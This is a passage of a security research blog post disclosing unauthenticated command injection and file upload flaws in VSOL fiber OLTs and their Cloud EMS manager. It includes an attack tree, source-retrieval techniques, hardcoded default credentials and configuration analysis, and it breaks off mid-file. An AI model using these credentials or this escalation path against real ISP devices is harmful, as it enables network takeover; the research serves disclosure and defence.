Quarkslab's blog - VSOLhttp://blog.quarkslab.com/2026-05-19T00:00:00+02:00How OLTs may have exposed entire ISP networks2026-05-19T00:00:00+02:002026-05-19T00:00:00+02:00Mathieu Farrelltag:blog.quarkslab.com,2026-05-19:/how-olts-may-have-exposed-entire-isp-networks.html<p>An Optical Line Terminal (OLT) is the central device in a Fiber-To-The-Home (FTTH) network that connects and manages all customer connections, making it a critical control point in an ISP's infrastructure for delivering high speed Internet. This article uncovers how unauthenticated access to OLTs can lead to a full network takeover starting by exploiting exposed vulnerable devices, showing how to pivot into the cloud-based fleet manager using other vulnerabilities, and then compromising an ISP's entire infrastructure.</p><h2 id="disclaimer">Disclaimer</h2>
<p>The research described in this blog post was conducted on software and devices in a private laboratory environment. All the materials (devices, source code, documentation) were publicly available and obtained from the Internet.
No attacks were conducted on operational sytems of real ISPs.</p>
<h2 id="introduction">Introduction</h2>
<p>This is the fifteenth article I have written over the past three years at
Quarkslab, and without a doubt, it has been the most thrilling and fun
to put together. The hidden world of ISP (Internet Service Provider) network
security might sound complex, but what I am about to reveal could shake up how
you see network defenses. In this post, I dive deep into how vulnerabilities in
critical devices can lead to the complete takeover of service provider networks.</p>
<p>Brace yourself, what follows is surprisingly simple, yet incredibly powerful.</p>
<h2 id="what-is-a-gpon-olt">What is a GPON OLT?</h2>
<p>A GPON OLT (Gigabit Passive Optical Network Optical Line Terminal) is a
telecommunications equipment serving as the primary interface between the
provider's core network and the passive optical fiber infrastructure that
delivers high speed internet to end users. It manages and controls multiple
optical network units (ONUs) or optical network terminals (ONTs) installed
at customer premises by multiplexing data streams over a shared fiber optic
line. The OLT handles tasks such as traffic scheduling, bandwidth allocation,
encryption, and fault management, ensuring efficient and secure bidirectional
communication across the network.</p>
<p>As the central hub of a GPON architecture, the OLT ensures a smooth handover
between the provider's IP backbone and the passive optical distribution network,
making it a critical control point for maintaining network performance, security,
and reliability in modern FTTH (fiber to the home) deployments.</p>
<p><a href="resources/2026-05-19_vsol/c21.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c21.png" width="100%"/></a></p>
<p class="center-text">Figure 1 - Diagram taken from the manufacturer's website showing the global network (example 1).</p>
<p></p>
<h2 id="where-are-they-located">Where are they located?</h2>
<p>GPON OLTs are typically housed in the service provider's central offices, data
centers, or telecommunications hubs. These locations are highly secure (or at
least should be), featuring reliable power supplies, cooling systems, and
physical security measures to ensure uninterrupted operation.</p>
<p>This equipment aggregates and manages traffic from thousands of subscribers
by connecting them to the optical distribution network (ODN which extends
via fiber cables to neighborhoods and individual homes). Centralizing OLTs
allows ISPs to efficiently control and monitor large segments of their network
while ensuring easy access for maintenance and upgrades.</p>
<p>For the average user, a GPON OLT functions much like a standard router by
managing and directing network traffic between the provider's core network and
end users. It handles routing, bandwidth allocation, security, and access
control. However, unlike a typical router, it also manages the physical fiber
infrastructure and coordinates shared access among multiple users, making it a
specialized device designed specifically for optical networks.</p>
<p><a href="resources/2026-05-19_vsol/c22.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c22.png" width="100%"/></a></p>
<p class="center-text">Figure 2 - Diagram taken from the manufacturer's website showing the network architecture (example 2).</p>
<p></p>
<h2 id="vulnerable-devices-from-which-manufacturer">Vulnerable devices from which manufacturer?</h2>
<p>As part of the offensive security assessment (adversary simulation mission)
targeting the infrastructure of an hypothetical ISP, I conducted my research on
some devices manufactured by <a href="https://www.vsolcn.com/">VSOL</a>[1], a vendor of
network equipment.</p>
<p><a href="resources/2026-05-19_vsol/c1.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c1.png" width="100%"/></a></p>
<p class="center-text">Figure 3 - <a href="https://www.vsolcn.com/about">About Us</a>[2] section taken from the vendor's website.</p>
<p></p>
<p>The vulnerabilities detailed in this article consist of different
unauthenticated Remote Code Execution (RCE) bugs affecting several OLT models.
They can be triggered via Command Injection payloads, allowing an attacker to
execute arbitrary commands on the vulnerable devices.</p>
<p>In addition, an unauthenticated RCE vulnerability was also discovered in the
fleet manager (<a href="https://www.vsolcn.com/down/cloud-ems-software"><i>Cloud EMS</i> software by VSOL</a>[4]).
The RCE was achieved through an unauthenticated and unrestricted Arbitrary File
Upload vulnerability, which allows an attacker to upload a JSP (JavaServer
Pages) webshell.</p>
<p><br/></p>
<p><u><b>Vulnerabilities related to OLTs:</b></u></p>
<table class="table table-striped">
<thead>
<th>Models</th>
<th>Affected version</th>
<th>Description</th>
</thead>
<tbody>
<tr>
<th scope="row">V1600GS-O32/V1600GS-F/V1600GS-ZF/V1600G0-B/V1600G1-B/V1600G2-B/V1600G1WEO-B/V1600GT/V1600XG02</th>
<td>Latest</td>
<td>Command Injection in the traceroute feature via SNMP (pre-auth) (binary: <span class="color-red">gpond</span> for V1600GS-O32/V1600GS-F/V1600GS-ZF, <span class="color-red">hostapp</span> for V1600G0-B/V1600G1-B/V1600G2-B/V1600G1WEO-B, <span class="color-red">vsapp</span> for V1600GT/V1600XG02).</td>
</tr>
<tr>
<th scope="row">V1600GS-O32/V1600GS-F/V1600GS-ZF/V1600G0-B/V1600G1-B/V1600G2-B/V1600G1WEO-B</th>
<td>Latest</td>
<td>Command Injection in TACACS+ login authentication feature via <span class="color-blue">/action/main.html</span> (pre-auth) (binary: <span class="color-red">gpond</span> for V1600GS-O32/V1600GS-F/V1600GS-ZF, <span class="color-red">hostapp</span> for V1600G0-B/V1600G1-B/V1600G2-B/V1600G1WEO-B).</td>
</tr>
<tr>
<th scope="row">V1600GS-O32/V1600GS-F/V1600GS-ZF/V1600G0-B/V1600G1-B/V1600G2-B/V1600G1WEO-B/V1600GT/V1600XG02</th>
<td>Latest</td>
<td>Command Injection in the traceroute feature via <span class="color-blue">/action/tracert.html</span> (pre-auth) (binary: <span class="color-red">gpond</span> for V1600GS-O32/V1600GS-F/V1600GS-ZF, <span class="color-red">hostapp</span> for V1600G0-B/V1600G1-B/V1600G2-B/V1600G1WEO-B, <span class="color-red">vsapp</span> for V1600GT/V1600XG02).</td>
</tr>
</tbody>
</table>
<p><br/></p>
<blockquote>
<p>🕷️ <u>Default Credentials:</u></p>
<p>All models from the manufacturer should not share the same default password
because it allows attackers to compromise multiple devices at scale using a
single known couple of credentials (<code>admin</code>/<code>Xpon@Olt9417#</code>).
These credentials can be found in the official documentation available on the
manufacturer's website, but are also hardcoded (in plain text) in the firmware binaries (some examples of binaries:
<span class="color-red">gpond</span>, <span class="color-red">hostapp</span>, <span class="color-red">vsapp</span>, <span class="color-red">vtysh</span>).</p>
</blockquote>
<p><br/></p>
<p><u><b>Vulnerability related to <i>Cloud EMS</i>:</b></u></p>
<table class="table table-striped">
<thead>
<th>Affected version</th>
<th>Description</th>
</thead>
<tbody>
<tr>
<td>Latest</td>
<td>
An Information Leakage, exploitable without authentication,
allows an attacker to retrieve information about the inner
workings of the underlying system.
</td>
</tr>
<tr>
<td>Latest</td>
<td>
An Arbitrary File Upload, exploitable without authentication,
allows an attacker to upload a JSP webshell on the <i>Tomcat</i> Web
server.
</td>
</tr>
</tbody>
</table>
<p><br/></p>
<p>To guide you through the rest of the blog post here is an attack tree depicting how an attacker could compromise a single exposed OLT device and escalate the attack to the entire network from it.</p>
<p><a href="resources/2026-05-19_vsol/c24v2.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c24v2.png" width="100%"/>
</a></p>
<p>However, since it is possible to interact with all OLTs managed by the fleet manager solution, I
will first discuss the vulnerabilities found in that software, as it represents a
central point in the exploit chain. Then, I will present the vulnerabilities
identified on different models of GPON OLTs.</p>
<h2 id="exploitation-of-the-cloud-based-fleet-management-tool-cloud-ems">Exploitation of the cloud based fleet management tool <i>Cloud EMS</i></h2>
<p>In most network diagrams illustrating the role of an OLT (available on the
manufacturer's website), <i>Cloud EMS</i> consistently appeared, which led me
to assume it was the solution used to manage a fleet of OLTs. This assumption
was later confirmed by the publicly available official documentation from the
vendor.</p>
<blockquote>
<p>🔍 <u>Identification of the fleet management solution:</u></p>
<p>Note the reference to <i>Cloud EMS</i> (the cloud based fleet manager) at the
top right of the diagram.</p>
</blockquote>
<p><a href="resources/2026-05-19_vsol/c0.jpg">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c0.jpg" width="100%"/></a></p>
<p class="center-text">Figure 4 - Diagram referring to <i>Cloud EMS</i> (part 1).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c11.jpg">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c11.jpg" width="100%"/></a></p>
<p class="center-text">Figure 5 - Diagram referring to <i>Cloud EMS</i> (part 2).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c23.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c23.png" width="100%"/></a></p>
<p class="center-text">Figure 6 - Diagram referring to <i>Cloud EMS</i> (part 3).</p>
<p></p>
<p>It did not take me much time to find the related <a href="https://www.vsolcn.com/blog/guide-to-install-bsems.html">documentation and installation</a>[3]
tutorials.</p>
<p><a href="resources/2026-05-19_vsol/c14.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c14.png" width="100%"/></a></p>
<p class="center-text">Figure 7 - <i>Cloud EMS</i> installation tutorials (part 1).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c15.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c15.png" width="100%"/></a></p>
<p class="center-text">Figure 8 - <i>Cloud EMS</i> installation tutorials (part 2).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c16.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c16.png" width="100%"/></a></p>
<p class="center-text">Figure 9 - <i>Cloud EMS</i> installation tutorials (part 3).</p>
<p></p>
<p>The first step in vulnerability research is getting the source code (or a
compiled version) of the targeted application. It gives you a starting point to
understand how the application works and spot potential weaknesses. So I started
my journey looking for the source code.</p>
<h3 id="retrieval-of-the-source-code">Retrieval of the source code</h3>
<p>The link provided by the vendor redirected to a download page, but it turned out
that the resource was no longer available. So I had to come up with another
solution to get the source code of the application.</p>
<p><a href="resources/2026-05-19_vsol/c2.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c2.png" width="100%"/></a></p>
<p class="center-text">Figure 10 - <i>Cloud EMS</i> download page.</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c3.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c3.png" width="100%"/></a></p>
<p class="center-text">Figure 11 - Resources removed and no longer available for download.</p>
<p></p>
<p>Using a simple Google dork technique with the query <code>"Index of" "VSOL" "EMS"</code>, I
was able to track down a copy of the application's source code.</p>
<p><a href="resources/2026-05-19_vsol/c4.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c4.png" width="100%"/></a></p>
<p class="center-text">Figure 12 - Google dork result.</p>
<p></p>
<p>Unfortunately, the site hosting these resources was no longer accessible.</p>
<p><a href="resources/2026-05-19_vsol/c5.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c5.png" width="100%"/></a></p>
<p class="center-text">Figure 13 - Website unavailable.</p>
<p></p>
<p>The site was only accessible via an archived snapshot on the Wayback Machine.
Sadly, the subfolders were not scanned and indexed by the Wayback Machine robot.</p>
<p><a href="resources/2026-05-19_vsol/c6.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c6.png" width="100%"/></a></p>
<p class="center-text">Figure 14 - Wayback Machine snapshot.</p>
<p></p>
<p>Before giving up on an inaccessible domain, it is always worth checking whether
the issue is simply due to a dead DNS resolution.</p>
<p><a href="resources/2026-05-19_vsol/c7.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c7.png" width="100%"/></a></p>
<p class="center-text">Figure 15 - DNS resolution fails.</p>
<p></p>
<p>In some cases, the domain name might no longer resolve, but the underlying
server could still be reachable via its IP address. To investigate this, I
queried archived DNS databases to retrieve historical IP resolutions associated
with the domain.</p>
<blockquote>
<p>💡 <u>Consult archived DNS databases:</u></p>
<p>This approach can sometimes help bypass DNS issues and regain access to
resources that seem offline.</p>
</blockquote>
<p><a href="resources/2026-05-19_vsol/c8.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c8.png" width="100%"/></a></p>
<p class="center-text">Figure 16 - Consulting databases storing old DNS records.</p>
<p></p>
<p>After retrieving the historical IP address of the server through archived DNS
records, it was possible to reach the server directly, bypassing the broken
domain resolution.</p>
<p><a href="resources/2026-05-19_vsol/c9.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c9.png" width="100%"/></a></p>
<p class="center-text">Figure 17 - Access to the server through its IP.</p>
<p></p>
<p>By doing so, I managed to access the Directory Listing and recover the source
files of the cloud based fleet management solution.</p>
<p><a href="resources/2026-05-19_vsol/c10.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c10.png" width="100%"/></a></p>
<p class="center-text">Figure 18 - Retrieval of the archive containing the application source code.</p>
<p></p>
<h3 id="analysis-of-the-source-code">Analysis of the source code</h3>
<p>The recovered archive, named <span class="color-red">Cloud_EMS_bsems_V2.3.1_20230217_linux_anyEn.tgz</span>,
contains a single top level directory called <span class="color-red">bsems</span>.
All the files and subdirectories are located within this folder.</p>
<p><a href="resources/2026-05-19_vsol/c12.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c12.png" width="100%"/></a></p>
<p class="center-text">Figure 19 - Extracted archive.</p>
<p></p>
<p>Folder <span class="color-red">bsems</span> contains the following items.</p>
<p><a href="resources/2026-05-19_vsol/c13.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c13.png" width="100%"/></a></p>
<p class="center-text">Figure 20 - Contents of folder <span class="color-red">bsems</span>.</p>
<p></p>
<p>Let's analyze the contents of this folder.</p>
<h4 id="analysis-of-file-startupsh">Analysis of file <span class="color-red">startup.sh</span></h4>
<p>File: <span class="color-red">startup.sh</span></p>
<div class="highlight"><pre><span></span><code>rm<span class="w"> </span>-rf<span class="w"> </span>./mysqldata
tar<span class="w"> </span>-zxvf<span class="w"> </span>mysqldata.tgz<span class="w"> </span>-C<span class="w"> </span>./
docker<span class="w"> </span>load<span class="w"> </span>-i<span class="w"> </span>bsemsimages.tar
docker-compose<span class="w"> </span>up<span class="w"> </span>-d
</code></pre></div>
<p>The above script prepares and launches a <i>Docker</i> based application
environment. It begins by removing any existing <i>MySQL</i> data directory to
ensure a clean setup, then extracts fresh database files from a compressed
archive. Next, it loads prebuilt <i>Docker</i> images from a <span class="color-red">.tar</span>
file into the local <i>Docker</i> engine. Finally, it starts all the necessary
containers in detached mode using <code>docker-compose</code>, bringing the application
stack online and ready to use.</p>
<p>Let's now take a look at the contents of file <span class="color-red">docker-compose.yml</span>.</p>
<h4 id="analysis-of-file-docker-composeyml">Analysis of file <span class="color-red">docker-compose.yml</span></h4>
<p>File: <span class="color-red">docker-compose.yml</span></p>
<div class="highlight"><pre><span></span><code><span class="nt">version</span><span class="p">:</span><span class="w"> </span><span class="s">'3'</span>
<span class="nt">services</span><span class="p">:</span>
<span class="w"> </span><span class="nt">mysql</span><span class="p">:</span>
<span class="w"> </span><span class="nt">restart</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">always</span>
<span class="w"> </span><span class="nt">image</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bsmysqlimage</span>
<span class="w"> </span><span class="nt">container_name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bsmysql</span>
<span class="w"> </span><span class="nt">environment</span><span class="p">:</span>
<span class="w"> </span><span class="nt">MYSQL_ROOT_PASSWORD</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">vsol2019</span>
<span class="w"> </span><span class="nt">volumes</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/etc/localtime:/etc/localtime:ro</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">./mysqldata/config/my.cnf:/etc/mysql/my.cnf</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">./mysqldata/data:/var/lib/mysql</span>
<span class="w"> </span><span class="nt">networks</span><span class="p">:</span>
<span class="w"> </span><span class="nt">bsnet</span><span class="p">:</span>
<span class="w"> </span><span class="nt">aliases</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">mysqlnet</span>
<span class="w"> </span><span class="nt">tomcat</span><span class="p">:</span>
<span class="w"> </span><span class="nt">restart</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">always</span>
<span class="w"> </span><span class="nt">image</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tomcat7-java8-202:v7.0.61</span>
<span class="w"> </span><span class="nt">container_name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tomcat7</span>
<span class="w"> </span><span class="nt">privileged</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">true</span>
<span class="w"> </span><span class="nt">ports</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">8086:8086</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">6443:6443</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">39998:39998</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">69:69/udp</span>
<span class="w"> </span><span class="nt">volumes</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/dev/mem:/dev/mem</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/sbin/dmidecode:/sbin/dmidecode</span><span class="w"> </span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/etc/localtime:/etc/localtime:ro</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">./tomcatmount/webapps:/usr/local/apache-tomcat-7.0.61/webapps</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">./tomcatmount/ssl/server.xml:/usr/local/apache-tomcat-7.0.61/conf/server.xml</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">./tomcatmount/ssl/vsoltomcat.keystore:/usr/local/apache-tomcat-7.0.61/vsoltomcat.keystore</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">./tomcatmount/lib:/usr/local/apache-tomcat-7.0.61/lib/</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/usr/bin/docker:/usr/bin/docker</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/var/run/docker.sock:/var/run/docker.sock</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/usr/lib64/libltdl.so.7:/usr/lib/x86_64-linux-gnu/libltdl.so.7</span>
<span class="w"> </span><span class="nt">networks</span><span class="p">:</span>
<span class="w"> </span><span class="nt">bsnet</span><span class="p">:</span>
<span class="w"> </span><span class="nt">aliases</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tomcatnet</span>
<span class="nt">networks</span><span class="p">:</span>
<span class="w"> </span><span class="nt">bsnet</span><span class="p">:</span>
<span class="w"> </span><span class="nt">driver</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bridge</span>
</code></pre></div>
<p>The above <span class="color-red">docker-compose.yml</span> file defines two
containers. A <i>MySQL</i> database and a <i>Tomcat</i> application server,
both connected via a custom bridge network called <code>bsnet</code>. The <i>MySQL</i>
container mounts persistent volumes for data storage and configuration.
The <i>Tomcat</i> container exposes several TCP ports (<code>8086</code>, <code>6443</code>, <code>39998</code>)
and an UDP port (<code>69</code>). Additionally, the <i>Tomcat</i> container runs in
<code>privileged mode</code> and has access to the <i>Docker</i> socket (<span class="color-red">/var/run/docker.sock</span>).</p>
<blockquote>
<p>🕷️ <u>Risk of container escape and Privilege Escalation:</u></p>
<p>Running the <i>Tomcat</i> container in <a href="https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities">privileged mode</a>[5]
and mounting the <i>Docker</i> socket increases the risk of container escape
and Privilege Escalation. If an attacker takes advantage of the vulnerability
found in the <i>Cloud EMS</i> source code (explained below), he might get <code>root</code>
access to the host and take control of the whole system.</p>
</blockquote>
<p>We will now try to locate the source code of the application served by the
<i>Tomcat</i> container. Looking inside directory <span class="color-red">tomcatmount/webapps</span>,
we find a deployed Web application named <span class="color-red">emsWebServer</span>,
along with its corresponding WAR archive (<span class="color-red">emsWebServer.war</span>).
The presence of directories such as <span class="color-red">WEB-INF</span>, <span class="color-red">META-INF</span>,
<span class="color-red">js</span>, and <span class="color-red">css</span> inside
<span class="color-red">emsWebServer</span> suggests that the WAR file has
already been unpacked, making the application's internal structure and
resources directly accessible. It allows to easily explore the configuration
files and compiled code (<span class="color-red">.class</span>) looking for
potential vulnerabilities.</p>
<p><a href="resources/2026-05-19_vsol/c17.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c17.png" width="100%"/></a></p>
<p class="center-text">Figure 21 - Already unpacked WAR archive (<span class="color-red">emsWebServer.war</span>).</p>
<p></p>
<h4 id="analysis-of-file-web-infwebxml-within-emswebserver">Analysis of file <span class="color-red">WEB-INF/web.xml</span> within <span class="color-red">emsWebServer</span></h4>
<p>The file <span class="color-red">web.xml</span> defines the deployment
configuration for the <span class="color-red">emsWebServer</span>
application running within the <i>Tomcat</i> container. It initializes the
<i>Spring</i> application context by loading XML configuration files from the
<span class="color-red">WEB-INF/classes/spring/</span> directory and sets up a
<i>Spring MVC</i> front controller (<code>DispatcherServlet</code>) to handle all incoming
HTTP requests via the root URL pattern (<span class="color-blue">/</span>).</p>
<p>File: <span class="color-red">WEB-INF/web.xml</span></p>
<div class="highlight"><pre><span></span><code><span class="cp"><?xml version="1.0" encoding="UTF-8"?></span>
<span class="w"> </span>...
<span class="w"> </span><span class="cm"><!-- 加载spring容器 --></span>
<span class="w"> </span><span class="nt"><context-param></span>
<span class="w"> </span><span class="nt"><param-name></span>contextConfigLocation<span class="nt"></param-name></span>
<span class="w"> </span><span class="nt"><param-value></span>/WEB-INF/classes/spring/applicationContext-*.xml<span class="nt"></param-value></span>
<span class="w"> </span><span class="nt"></context-param></span>
<span class="w"> </span><span class="cm"><!-- springmvc前端控制器,rest配置 --></span>
<span class="w"> </span><span class="nt"><servlet></span>
<span class="w"> </span><span class="nt"><servlet-name></span>springmvc_rest<span class="nt"></servlet-name></span>
<span class="w"> </span><span class="nt"><servlet-class></span>org.springframework.web.servlet.DispatcherServlet<span class="nt"></servlet-class></span>
<span class="w"> </span><span class="cm"><!-- contextConfigLocation配置springmvc加载的配置文件(配置处理器映射器、适配器等等) 如果不配置contextConfigLocation,默认加载的是/WEB-INF/servlet名称-serlvet.xml(springmvc-servlet.xml) --></span>
<span class="w"> </span><span class="nt"><init-param></span>
<span class="w"> </span><span class="nt"><param-name></span>contextConfigLocation<span class="nt"></param-name></span>
<span class="w"> </span><span class="nt"><param-value></span>classpath:spring/springmvc.xml<span class="nt"></param-value></span>
<span class="w"> </span><span class="nt"></init-param></span>
<span class="w"> </span><span class="nt"></servlet></span>
<span class="w"> </span><span class="nt"><servlet-mapping></span>
<span class="w"> </span><span class="nt"><servlet-name></span>springmvc_rest<span class="nt"></servlet-name></span>
<span class="w"> </span><span class="nt"><url-pattern></span>/<span class="nt"></url-pattern></span>
<span class="w"> </span><span class="nt"></servlet-mapping></span>
<span class="w"> </span>...
</code></pre></div>
<p>The application integrates <a href="https://shiro.apache.org/">Apache Shiro</a>, an open
source Java authentication and authorization framework, by defining a servlet
filter named <code>shiroFilter</code>. This filter is implemented using <code>org.springframework.web.filter.DelegatingFilterProxy</code>
(<a href="https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/filter/DelegatingFilterProxy.html">Class DelegatingFilterProxy</a>[6]),
which allows <i>Shiro</i> to be managed as a <i>Spring Bean</i> and fully
integrated into the <i>Spring</i> application context. The filter is applied
to all URL patterns (<span class="color-blue">/*</span>), ensuring that every
incoming HTTP request passes through <i>Shiro</i>'s security layer.</p>
<p>File: <span class="color-red">WEB-INF/web.xml</span></p>
<div class="highlight"><pre><span></span><code><span class="w"> </span>...
<span class="w"> </span><span class="cm"><!-- shiro配置开始 --></span>
<span class="w"> </span><span class="nt"><filter></span>
<span class="w"> </span><span class="nt"><filter-name></span>shiroFilter<span class="nt"></filter-name></span>
<span class="w"> </span><span class="nt"><filter-class></span>org.springframework.web.filter.DelegatingFilterProxy<span class="nt"></filter-class></span>
<span class="w"> </span><span class="nt"><async-supported></span>true<span class="nt"></async-supported></span>
<span class="w"> </span><span class="nt"><init-param></span>
<span class="w"> </span><span class="nt"><param-name></span>targetFilterLifecycle<span class="nt"></param-name></span>
<span class="w"> </span><span class="nt"><param-value></span>true<span class="nt"></param-value></span>
<span class="w"> </span><span class="nt"></init-param></span>
<span class="w"> </span><span class="nt"></filter></span>
<span class="w"> </span><span class="nt"><filter-mapping></span>
<span class="w"> </span><span class="nt"><filter-name></span>shiroFilter<span class="nt"></filter-name></span>
<span class="w"> </span><span class="nt"><url-pattern></span>/*<span class="nt"></url-pattern></span>
<span class="w"> </span><span class="nt"></filter-mapping></span>
<span class="w"> </span><span class="cm"><!-- shiro配置结束 --></span>
<span class="w"> </span>...
</code></pre></div>
<p>Let's take a closer look at this filter.</p>
<h4 id="analysis-of-file-web-infclassesspringapplicationcontext-shiroxml-within-emswebserver">Analysis of file <span class="color-red">WEB-INF/classes/spring/applicationContext-shiro.xml</span> within <span class="color-red">emsWebServer</span></h4>
<p>The file below serves as the core configuration for integrating <i>Apache Shiro</i>
in the <i>Spring</i> Web application. It defines the key components required
for authentication, authorization, and session management. The <code>ShiroFilterFactoryBean</code>,
intercepts HTTP requests and delegates access control decisions based on the
defined <code>filterChainDefinitions</code>. Within the <code>filterChainDefinitions</code> section
of the <i>Shiro</i> configuration, the <code>anon</code> keyword defines which URL paths
are publicly accessible without requiring authentication. This is particularly
important for resources like static files (e.g., CSS, JavaScript, images) and
endpoints related to login. For example, paths like <span class="color-blue">/css/<strong></strong></span>,
<span class="color-blue">/img/</span>, and <span class="color-blue">/js/**</span>
are marked as <code>anon</code>, which tells <i>Shiro</i> to allow access to these
resources without checking for a user session.</p>
<p>File: <span class="color-red">WEB-INF/classes/spring/applicationContext-shiro.xml</span></p>
<div class="highlight"><pre><span></span><code><span class="cp"><?xml version="1.0" encoding="UTF-8"?></span>
<span class="nt"><beans</span><span class="w"> </span><span class="na">xmlns:xsi=</span><span class="s">"..."</span><span class="nt">></span>
<span class="w"> </span>...
<span class="w"> </span><span class="cm"><!-- url过滤器 --></span><span class="w"> </span>
<span class="w"> </span><span class="nt"><bean</span><span class="w"> </span><span class="na">id=</span><span class="s">"urlPathMatchingFilter"</span><span class="w"> </span><span class="na">class=</span><span class="s">"com.vsol.shiro.URLPathMatchingFilter"</span><span class="nt">/></span>
<span class="w"> </span><span class="cm"><!-- 配置shiro的过滤器工厂类,id- shiroFilter要和我们在web.xml中配置的过滤器一致 --></span>
<span class="w"> </span><span class="nt"><bean</span><span class="w"> </span><span class="na">id=</span><span class="s">"shiroFilter"</span><span class="w"> </span><span class="na">class=</span><span class="s">"org.apache.shiro.spring.web.ShiroFilterFactoryBean"</span><span class="nt">></span>
<span class="w"> </span><span class="cm"><!-- 调用我们配置的权限管理器 --></span>
<span class="w"> </span><span class="nt"><property</span><span class="w"> </span><span class="na">name=</span><span class="s">"securityManager"</span><span class="w"> </span><span class="na">ref=</span><span class="s">"securityManager"</span><span class="w"> </span><span class="nt">/></span>
<span class="w"> </span><span class="nt"><property</span><span class="w"> </span><span class="na">name=</span><span class="s">"loginUrl"</span><span class="w"> </span><span class="na">value=</span><span class="s">"uc/index"</span><span class="w"> </span><span class="nt">/></span><span class="cm"><!-- 这里的value是请求而不是视图 --></span>
<span class="w"> </span><span class="nt"><property</span><span class="w"> </span><span class="na">name=</span><span class="s">"filters"</span><span class="nt">></span>
<span class="w"> </span><span class="nt"><util:map></span>
<span class="w"> </span><span class="nt"><entry</span><span class="w"> </span><span class="na">key=</span><span class="s">"url"</span><span class="w"> </span><span class="na">value-ref=</span><span class="s">"urlPathMatchingFilter"</span><span class="w"> </span><span class="nt">/></span>
<span class="w"> </span><span class="nt"></util:map></span>
<span class="w"> </span><span class="nt"></property></span>
<span class="w"> </span><span class="cm"><!-- 权限配置 --></span>
<span class="w"> </span><span class="nt"><property</span><span class="w"> </span><span class="na">name=</span><span class="s">"filterChainDefinitions"</span><span class="nt">></span>
<span class="w"> </span><span class="nt"><value></span>
<span class="w"> </span><span class="cm"><!-- anon表示此地址不需要任何权限即可访问 --></span>
<span class="w"> </span>/css/**<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/fonts/**<span class="w"> </span>=<span class="w"> </span>anon
